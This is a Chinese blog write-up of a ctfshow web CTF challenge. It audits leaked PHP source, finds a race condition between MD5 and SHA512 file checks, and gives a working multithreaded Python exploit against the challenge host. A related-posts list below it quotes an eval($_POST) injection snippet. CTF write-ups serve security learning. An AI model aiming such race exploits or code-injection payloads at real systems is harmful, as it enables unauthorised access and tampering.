ctfshow-web红包题第六弹

最新推荐文章于 2024-07-11 16:57:09 发布
最新推荐文章于 2024-07-11 16:57:09 发布
阅读量215 收藏 1
点赞数 6
文章标签: python 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2202_75812594/article/details/138073819
版权
文章讲述了如何通过分析网页源码中的JavaScript代码,发现了一个利用条件竞争的漏洞,攻击者可以上传文件并修改flag.dat的内容以绕过后续的安全检查。作者详细描述了审计过程和利用此漏洞的方法。
摘要由CSDN通过智能技术生成

打开题目F12查看网页源码,得到JavaScript代码:

<script>
		function login(s){  
		var u=document.getElementById("username").value;
		var p=document.getElementById("password").value;
        var xhr = new XMLHttpRequest();  
        xhr.open('GET', "login.php?u="+u+"&p="+p);  
        xhr.responseType = 'arraybuffer';  
        xhr.onreadystatechange = function getPdfOnreadystatechange(e) {  
            if (xhr.readyState === 4) {  
              if (xhr.status === 200) {  
                 var data = (xhr.mozResponseArrayBuffer || xhr.mozResponse ||  
                            xhr.responseArrayBuffer || xhr.response);   
				if(data){
					ctfshow(s,data);
				}
              } 
            }  
        };  
        xhr.send(null);  
		}  
		function ctfshow(token,data){

			var oReq = new XMLHttpRequest();
			oReq.open("POST", "check.php?token="+token+"&php://input", true);
			oReq.onload = function (oEvent) {
				if(oReq.status===200){
						var res=eval("("+oReq.response+")");
						if(res.success ==1 &&res.error!=1){
							alert(res.msg);
							return;
						}
						if(res.error ==1){
							alert(res.errormsg);
							return;
						}
				}
				return;
			};
			oReq.send(data);
		}
</script>

通过审计发现在ctfshow() 函数里有一条向服务器发送请求的代码。通过观察得知,存在check.php的页面。

oReq.open("POST", "check.php?token="+token+"&php://input", true);

通过dirmap或者dirsearch进行目录扫描,发现了一个web.zip的文件,下载即能获取check.php的源代码

<?php
function receiveStreamFile($receiveFile){ //flag.dat
 
    $streamData = isset($GLOBALS['HTTP_RAW_POST_DATA'])? $GLOBALS['HTTP_RAW_POST_DATA'] : '';
	//$GLOBALS['HTTP_RAW_POST_DATA'] 是 PHP 中的一个全局变量,用于存储 HTTP 请求中的原始 POST 数据   --->   ?token="+token+"&php://input"
 
    if(empty($streamData)){
        $streamData = file_get_contents('php://input');
    }
 
    if($streamData!=''){
        $ret = file_put_contents($receiveFile, $streamData, true); 
		//file_put_contents('flag.dat', 'php://input', true)  对flag.dat写入数据
    }else{
        $ret = false;
    }
 
    return $ret;
 
}

if(md5(date("i")) === $token){
	
	$receiveFile = 'flag.dat';
	receiveStreamFile($receiveFile);//由于先打开文件,在进行sha512判断,存在条件竞争
	if(md5_file($receiveFile)===md5_file("key.dat")){//在检测完MD5后,利用判断的间隙,修改flag.dat的数据。
		if(hash_file("sha512",$receiveFile)!=hash_file("sha512","key.dat")){
			$ret['success']="1";
			$ret['msg']="人脸识别成功!$flag";
			$ret['error']="0";
			echo json_encode($ret);
			return;
		}

			$ret['errormsg']="same file";
			echo json_encode($ret);
			return;
	}
			$ret['errormsg']="md5 error";
			echo json_encode($ret);
			return;
} 

$ret['errormsg']="token error";
echo json_encode($ret);
return;

审计代码

md5(date("i")) === $token

1、date获取当前时间的分钟数,然后和我们传入的Token进行一个对比。

2、通过receiveStreamFile()函数对flag.dat文件进行数据传入。通过php://input

3、由于先对文件进行操作,在进行之后的判断,我们可以利用md5中间判断的极小间隙替换原来flag.dat的数据,让sha512成立,造成条件竞争。

playload:

import requests
import datetime
import threading
import hashlib

# 获取当前时间的分钟
t = datetime.datetime.now().minute
token = hashlib.md5(str(t).encode()).hexdigest()

# 下载key.dat
url = "https://eeedcdd1-77ee-428c-b983-2a9e243d3714.challenge.ctf.show/"
r1 = requests.get(url + "key.dat")
with open('key.dat', 'wb') as f:
    f.write(r1.content)

def upload_data(url, data):
    # 通过php://input上传flag.dat的数据
    url = f"{url}check.php?token={token}&php://input"
    s = requests.post(url, data=data)
    print(s.text)

with open('key.dat', 'rb') as f:
    data1 = f.read()

for i in range(50):
    threading.Thread(target=upload_data, args=(url, data1)).start()
for i in range(50):
    # sha512进行判断,让它不相等
    data2 = 'We are not equal'
    threading.Thread(target=upload_data, args=(url, data2)).start()

由于条件竞争的是利用时间间隙来进行绕过,运气不好可能需要运行多次才能看到flag。 

心故
关注
  • 6
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ctfshow-VIP目-Web-详细解思路
01-27
CTFSHOW-VIP目-Web-详细解思路 本文档总结了CTFSHOW-VIP目-Web的详细解思路,涵盖了多个Web安全领域的知识点,包括WP源码泄露、协议头信息泄露、robots后台泄露、phps源码泄露、源码压缩包泄露、版本控制...
CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$
03-04
【标】"CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$" 指的是一项网络安全竞赛中的Web目,该目重点在于理解PHP编程语言中的变量循环取值机制。在CTF(Capture The Flag)比赛中,参赛者通常需要解决各种...
吾爱2023新年红包第六 (CTF)
热门推荐
Codeoooo 博客
06-27 4万+
而且这里面还判断了key的长度,16位,正常key长度也是16位;上面这个 aWfkuqokj454836 15位,心态崩了,看来是假的,这个里面才是真的啊~~~~~~这几道,完全就是整人玩,一个一直点999次,一个大喊大叫还说你是细狗,还得声音分贝大于100才解锁开始找flag;直接将这个 |wfkuqokj4548366 key 扔进去 get_RealKey方法,在比较的时候打断点,或者hook,拿到正确的可以;看伪C代码,memcmp比较, 是有个和真key比较的地方,返回bool;
CTFshow--web--红包第六
weixin_45908624的博客
01-29 884
ctfshow--web--红包第六
ctf.show_红包第六
m0_74445847的博客
04-20 231
3.在极短的时间内,传上不同的key2.dat,通过SHA-512哈希值的比较。2.先上传一模一样的key.dat,通过md5值的比较。这里放了竞争的两种格式。
ctfshow-红包第六
XYH_233的博客
03-13 816
CTFshow红包第六,正解
CTFshow-web-红包第六
qq_68581192的博客
11-03 154
首先获得key.dat,首先访问一下这个文件,emmm,果然直接下载了,那么第一层的绕过我们直接就使用了key.dat文件,第二层的sha1值我们随便上传一个字符串即可,所以我们需要并发编程,将$receiveFile中的内容在极短时间内进行替换,这里我们可以编写一个python脚本来进行解。发现web.zip目录是直接下载的,另外两个会跳转页面,但是内容是显示什么什么然后error。发现是跟key.dat比较,我们尝试在url中添加/key.dat,发现可以下载,我们利用下列代码。
ctfshow-web-红包第六
HAI_WD的博客
08-26 1165
原理就是将上传的文件保存为flag.dat,然后进行对比,那么这种情况肯定会出现条件竞争,也就是说flag.dat在比较完第一次之后被覆盖了的话,就可以满足第二个条件。进行md5,然后就是文件md5对比,要求md5一致,但是sha512不一样,这里比较的文件是key.dat。首先跑一下字典,这里用的dirmap,可以看到有一个web.zip。下载下来之后发现是一个网站备份,备份的是check.php.bak。然后接着看,可以看到这里不太可能是sql注入,有一个请求。直接访问进行下载即可。
[ctf.show.reverse] 红包
weixin_52640415的博客
04-15 1007
下来是个压缩包,解开后一个原码,解码后是notflag,发现压缩包有5k大而解出的java文件只有1k,显然包里还有内容未解出 用010打开包发现有两个EzJar.class文件,手工切出解压 import zlib inflator = zlib.decompressobj(-zlib.MAX_WBITS) f=open('EzJar.jar','rb') f.seek(659) a=f.read(3248) f.close() x = inflator.decompress(a) f=open('
红包六(CTFshow)
m0_72827793的博客
01-25 954
我对应着看,结果发现都是0000,奇怪了,这怎么找?可以直接丢进去看,也可以用jd反汇编工具看。这里提示flag不在这里分析一下这段代码。3248怎么来的没搞懂,做个记录吧。就这样用jd反汇编打开这个java。但确实学习了一波压缩包的文件结构。压缩文件有5k解压却变成了1k。为什么是从第659个字节开始?jd逆向工具反编译jar文件。这得对压缩包的文件结构熟悉。jar的逆向,第一次接触。看了别人写的脚本文件。
ctfshow-web41~60-WP
02-21
ctfshow-web41~60-WPctfshow-web41~60-WP
ctfshow web189 无单引号,利用回显不同,盲注
10-21
ctfshow web189 无单引号,利用回显不同,盲注
CTFShow-周末大挑战parse-url篇Writeup
05-19
第六关,通过在URL中插入JavaScript代码 `<script language="php">eval($_POST[A]);</script>`,试图执行POST请求中的PHP代码。这意味着服务器可能同时解析PHP和JavaScript,存在跨语言代码注入的风险。 这些关卡...
ctfshow红包第六 wp
最新发布
jwkaaaaaa的博客
07-11 125
ctfshow红包第六 wp
ctfshow红包第六
weixin_43873408的博客
08-02 1670
在开始界面点击hint得到提示信息: 打开连接得到的是一个登录界面,前面提示了不是sql注入,直接放弃尝试,查看网页源码得到信息: <script> function login(s){ var u=document.getElementById("username").value; var p=document.getElementById("password").value; var xhr = new XMLHttpRequest();
之旅第39站,CTFshow 红包目8
cc菜的一批
02-19 898
感谢ctf show平台提供目 下载压缩包,看到了两个文件。 使用010editor 打开mima.png ,在末尾处发现 kobe code。 这里附上@Admin师傅提供的kobe code对照图。 对应着解出来了压缩包密码。 OAEBEYTKNRBANB 解压出NBA.mp4之后,我们发现视频并不能播放,使用010查看前几个十六进制为: 再百度一下mp4的文件结构。 通过规律,...
ctfshow-红包第五
qq_42016346的博客
02-17 1223
目链接:https://www.lanzous.com/i9e23fi 下载得到一个压缩包打开后发现只有画.mp3,很容易猜测是音频隐写 首先照例HxD一波 发现不正常的尾部而且是以FFD9结尾的,明显这压缩包还藏了一张图片 foremost分离一下得到隐藏的图片 再重复上面的步骤没任何发现就开始做了 一个mp3一张图片,emmm音频隐写加密没跑了(真的大坑- -) ...
ctf.show_web5
10-22
ctf.show_web5是一个CTF比赛中的WEB模块第5关,需要传递两个参数v1和v2,要求v1必须是纯字母字符串,v2必须是数字或数字字符串,并且两个参数的md5值必须相等。可以利用md5的0e漏洞进行绕过。具体来说,可以构造一个字符串,使得它的md5值以0e开头,然后将这个字符串作为v1和v2的值传递即可。在PHP中,当字符串以0e开头并且后面跟着一串数字时,PHP会将这个字符串解析成科学计数法的形式,因此可以绕过is_numeric()函数的检测。而ctype_alpha()函数只检测字符串中是否仅包含字母,不会对字符串进行其他处理,因此不会受到0e漏洞的影响。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值